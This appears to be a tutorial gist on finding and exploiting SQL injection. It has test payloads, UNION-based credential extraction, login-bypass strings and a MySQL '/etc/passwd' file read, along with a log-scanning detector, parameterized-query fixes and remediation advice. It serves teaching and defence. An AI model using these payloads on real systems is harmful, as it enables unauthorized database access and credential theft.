@aw-junaid
Created November 24, 2025 09:01
A SQL injection (SQLi) vulnerability is a web security flaw that enables an attacker to interfere with the queries an application makes to its database. It occurs when an application uses unsanitized user-supplied input to dynamically construct SQL queries, allowing malicious SQL code to be executed.

Finding a SQL Injection Vulnerability

Important Note: Always start with deliberately vulnerable applications like DVWA (Damn Vulnerable Web Application) or Web Security Academy before testing on real bug bounty programs.

Step 1: Map User Input Endpoints

Identify all locations where the application accepts user input:

Common SQLi injection points:

  • URL Parameters: GET /users?id=1
  • Search Fields: GET /search?query=test
  • Login Forms: POST /login with username=admin&password=pass
  • Filter/Sort Parameters: GET /products?category=books&sort=price
  • HTTP Headers: X-Forwarded-For, User-Agent, Referer
  • API Endpoints: GET /api/users/1

Example from our target https://shop.example.com:

  • GET /products?id=1
  • GET /search?q=laptop
  • POST /login (username/password)
  • GET /user/profile?user_id=1001

Step 2: Insert Test Payloads

Start with simple payloads to detect vulnerabilities:

Basic Detection Payloads:

'                       -- Check for errors
"                       -- Check for errors
`                       -- Check for errors
\                       -- Escape character test
1 OR 1=1                -- Boolean-based test
1' OR '1'='1            -- String-based test

Testing https://shop.example.com/products?id=1:

  1. https://shop.example.com/products?id=1'
  2. https://shop.example.com/products?id=1"
  3. https://shop.example.com/products?id=1 OR 1=1
  4. https://shop.example.com/products?id=1' OR '1'='1

Observe the responses:

  • Database Errors: You have an error in your SQL syntax, MySQL server version, etc.
  • Different Content: Page shows different data or behaves unexpectedly
  • Time Delays: Page takes longer to load (potential time-based SQLi)

If basic payloads don't work, try inferential (Blind) SQLi:

Boolean-Based Blind SQLi:

1' AND 1=1-- -          -- Normal response expected
1' AND 1=2-- -          -- Empty/error response expected

Time-Based Blind SQLi:

1' AND SLEEP(5)-- -     -- MySQL
1' AND pg_sleep(5)-- -  -- PostgreSQL
1' WAITFOR DELAY '0:0:5'-- -  -- MSSQL
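Seen from the defending side, every probe listed in this step leaves a trace in the web server's access log: the quote characters, the `OR 1=1` tautology, `UNION SELECT`, the `SLEEP`/`pg_sleep`/`WAITFOR DELAY` calls and the trailing `-- -` comment. The scanner below is an added example written for this note, not code from the gist; it URL-decodes each request line, scores it against those indicators, and treats a 5xx response to a lone quote as the error-based signal described under "Observe the responses". The log lines, the client addresses and the host shop.example.com are constructed sample data.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (combined-log style). The request strings are
# URL-encoded forms of the probe payloads listed in the steps above; addresses and
# the host are hypothetical.
SAMPLE_ACCESS_LOG = """\
203.0.113.5 - - [24/Nov/2025:09:01:10 +0000] "GET /products?id=1 HTTP/1.1" 200 5120
203.0.113.5 - - [24/Nov/2025:09:01:12 +0000] "GET /products?id=1%27 HTTP/1.1" 500 312
203.0.113.5 - - [24/Nov/2025:09:01:15 +0000] "GET /products?id=1%27%20OR%20%271%27%3D%271 HTTP/1.1" 200 98211
203.0.113.5 - - [24/Nov/2025:09:01:20 +0000] "GET /products?id=1%27%20AND%20SLEEP(5)--%20- HTTP/1.1" 200 5120
198.51.100.7 - - [24/Nov/2025:09:02:01 +0000] "GET /search?q=laptop HTTP/1.1" 200 8800
198.51.100.7 - - [24/Nov/2025:09:02:05 +0000] "GET /products?id=1%27%20UNION%20SELECT%201,table_name,3%20FROM%20information_schema.tables--%20- HTTP/1.1" 200 45000
"""

# Parses: client ip, timestamp, method, raw path, status, response bytes.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-)'
)

# Indicator patterns with weights. A quote on its own is weak evidence (a search for
# "men's" is legitimate), so it only reaches the alert threshold together with
# another indicator or with a server error.
INDICATORS = [
    ("quote_or_escape", 1, re.compile(r"""['"`\\]""")),
    ("sql_comment", 1, re.compile(r"--\s|--$|#|/\*")),
    ("tautology", 3, re.compile(r"""\bOR\s+['"]?\d+['"]?\s*=\s*['"]?\d+""", re.I)),
    ("union_select", 3, re.compile(r"\bUNION\b.*?\bSELECT\b", re.I | re.S)),
    ("time_delay", 3, re.compile(r"\b(?:SLEEP|pg_sleep|BENCHMARK)\s*\(|\bWAITFOR\s+DELAY\b", re.I)),
    ("schema_probe", 2, re.compile(r"information_schema", re.I)),
]
ALERT_THRESHOLD = 2


def score_request(decoded_path, status):
    """Return the list of (indicator, weight) hits for one decoded request."""
    hits = [(name, w) for name, w, rx in INDICATORS if rx.search(decoded_path)]
    names = [n for n, _ in hits]
    # A 5xx answer right after a quote probe is the classic error-based signal.
    if status >= 500 and "quote_or_escape" in names:
        hits.append(("db_error_after_quote", 2))
    return hits


def scan_access_log(text):
    """Return one finding per log line whose indicator score reaches the threshold."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        decoded = unquote_plus(m.group("path"))  # probes arrive URL-encoded
        hits = score_request(decoded, int(m.group("status")))
        total = sum(w for _, w in hits)
        if total >= ALERT_THRESHOLD:
            findings.append({"line": lineno, "ip": m.group("ip"), "request": decoded,
                             "score": total, "indicators": [n for n, _ in hits]})
    return findings


def flagged_lines(text):
    """Convenience view: just the log line numbers that were flagged."""
    return [f["line"] for f in scan_access_log(text)]


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"line {f['line']} from {f['ip']} score={f['score']} "
              f"{f['indicators']}: {f['request']}")
```

On the sample data the plain requests for `id=1` and `q=laptop` pass, while the four probe lines are flagged; grouping findings by client address over a short window is the usual next step, since a real test of one parameter produces a burst like this from a single source. Decoding before matching matters: the same payloads arrive as `%27` and `%20` and would slip past a pattern applied to the raw line.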

Step 3: Exploit and Extract Information

Once you have confirmed the vulnerability, extract data systematically:

Determine Database Type:

1' UNION SELECT @@version-- -          -- MySQL
1' UNION SELECT version()-- -          -- PostgreSQL
1' UNION SELECT @@version-- -          -- MSSQL

Basic UNION Attacks (when you see results):

-- Find number of columns
1' ORDER BY 1-- -
1' ORDER BY 2-- -
1' ORDER BY 3-- -  -- Continue until error

-- Example: If 3 columns work
1' UNION SELECT 1,2,3-- -              -- See which columns display data

-- Extract database information
1' UNION SELECT 1,database(),user()-- -
1' UNION SELECT 1,table_name,3 FROM information_schema.tables-- -

Practical Example - Extract Users Table:

-- Get table names
1' UNION SELECT 1,table_name,3 FROM information_schema.tables WHERE table_schema=database()-- -

-- Get column names from users table
1' UNION SELECT 1,column_name,3 FROM information_schema.columns WHERE table_name='users'-- -

-- Extract data
1' UNION SELECT 1,username,password FROM users-- -

Blind SQLi Data Extraction:

-- Extract database name character by character
1' AND substring(database(),1,1)='a'-- -
1' AND substring(database(),1,1)='b'-- -

-- Or with time delays
1' AND IF(substring(database(),1,1)='a',SLEEP(5),0)-- -

Step 4: Escalate the Issue

Assess the impact:

  • Data Extraction: Can you read user credentials, personal data, financial information?
  • Authentication Bypass:
    admin' OR '1'='1'-- -
    admin'-- -
    ' OR 1=1-- -
  • Database Takeover: Can you read/write files or execute commands?
    SELECT LOAD_FILE('/etc/passwd')                    -- MySQL file read
    SELECT * FROM users INTO OUTFILE '/tmp/users.txt' -- MySQL file write

Important: Never use destructive commands like DROP TABLE, DELETE, or modify production data.

Additional Exploitation Examples:

-- Extract table names
1' UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema=database()-- -

-- Extract user credentials
1' UNION SELECT 1,username,password,4 FROM users-- -

Impact: An attacker can:

  • Extract the entire database contents including user credentials, personal information, and business data
  • Bypass authentication mechanisms
  • Potentially achieve remote code execution depending on database configuration
  • Compromise all user accounts and sensitive business information

Remediation Recommendations:

  1. Use Parameterized Queries: Implement prepared statements with parameterized queries
  2. Input Validation: Apply strict whitelist validation on all user inputs
  3. Principle of Least Privilege: Ensure database users have minimal required permissions
  4. Web Application Firewall: Deploy WAF rules to detect and block SQL injection attempts
  5. Security Testing: Conduct regular penetration testing and code reviews
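To make recommendations 1 and 2 concrete, the example below (added here; it is not code from the gist) shows the `/products?id=` lookup from Step 1 written the vulnerable way beside its hardened form, using Python's standard `sqlite3` module and a constructed in-memory product table. The `1 OR 1=1` value is the Boolean-based test from Step 2: against the concatenated query it returns every row, while the hardened version rejects it at validation and would in any case only bind it as data. The sort parameter shows the case a bound parameter cannot cover, since column names are not bindable, so an allow-list is the control there. Table and column names are hypothetical.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the shop's product table (hypothetical schema)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL, hidden INTEGER);
        INSERT INTO products VALUES (1, 'Laptop', 999.0, 0);
        INSERT INTO products VALUES (2, 'Mouse', 19.5, 0);
        INSERT INTO products VALUES (3, 'Unreleased phone', 0.0, 1);
    """)
    return conn


# 'Before' form, kept deliberately vulnerable for contrast: the id parameter is pasted
# into the query text, so the database parses whatever the client sent as SQL.
def product_lookup_vulnerable(conn, product_id):
    sql = "SELECT id, name, price FROM products WHERE id = " + product_id
    return conn.execute(sql).fetchall()


# Hardened form: strict validation (the id must be an integer) followed by a
# parameterized query. The value travels separately from the query text and is
# compared to the id column as data; it is never parsed as SQL.
def product_lookup_safe(conn, product_id):
    try:
        pid = int(product_id)
    except (TypeError, ValueError):
        raise ValueError(f"invalid product id: {product_id!r}")
    return conn.execute(
        "SELECT id, name, price FROM products WHERE id = ?", (pid,)
    ).fetchall()


# Column names cannot be bound as parameters, so the sort key is mapped through an
# allow-list and only the server-side column name ever reaches the query text.
ALLOWED_SORT = {"price": "price", "name": "name"}


def list_products_safe(conn, sort):
    column = ALLOWED_SORT.get(sort)
    if column is None:
        raise ValueError(f"unsupported sort key: {sort!r}")
    return conn.execute(
        f"SELECT id, name FROM products WHERE hidden = 0 ORDER BY {column}"
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, id=1        ->", product_lookup_vulnerable(db, "1"))
    print("vulnerable, id=1 OR 1=1 ->", product_lookup_vulnerable(db, "1 OR 1=1"))
    print("safe, id=2              ->", product_lookup_safe(db, "2"))
    for bad in ("1 OR 1=1", "1'"):
        try:
            product_lookup_safe(db, bad)
        except ValueError as e:
            print("safe rejected:", e)
    print("sorted by price         ->", list_products_safe(db, "price"))
```

Note how the hidden row only leaks through the vulnerable path: with the tautology appended, the `WHERE` clause is true for every row, which is exactly the "different content" signal from Step 2. For recommendation 3, the equivalent of `hidden = 0` at the account level is a dedicated database user that holds only `SELECT` on the tables the application needs; in MySQL that account should not hold the `FILE` privilege, which is what `LOAD_FILE()` and `INTO OUTFILE` from Step 4 depend on.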

Technical Details:

  • Database Type: MySQL (detected via version())
  • Injection Type: Union-Based SQL Injection
  • Vulnerable Parameter: id (GET parameter)

Essential Tools for SQL Injection:

  • Manual Testing: Burp Suite, Browser Developer Tools
  • Automated Scanning: SQLmap (use responsibly and only with permission!)
  • Practice Environments: DVWA, Web Security Academy, HackTheBox

Pro Tips for SQLi Hunting:

  • Start Simple: Begin with basic error-based detection
  • Understand Context: Is it string/numeric? What's the query structure?
  • Use Comments: -- -, #, /* */ to handle trailing SQL
  • Test Different Entry Points: Don't just test URL parameters - test everything!
  • Be Patient: Blind SQLi requires careful, methodical testing
  • Document Everything: Keep detailed notes of what works and what doesn't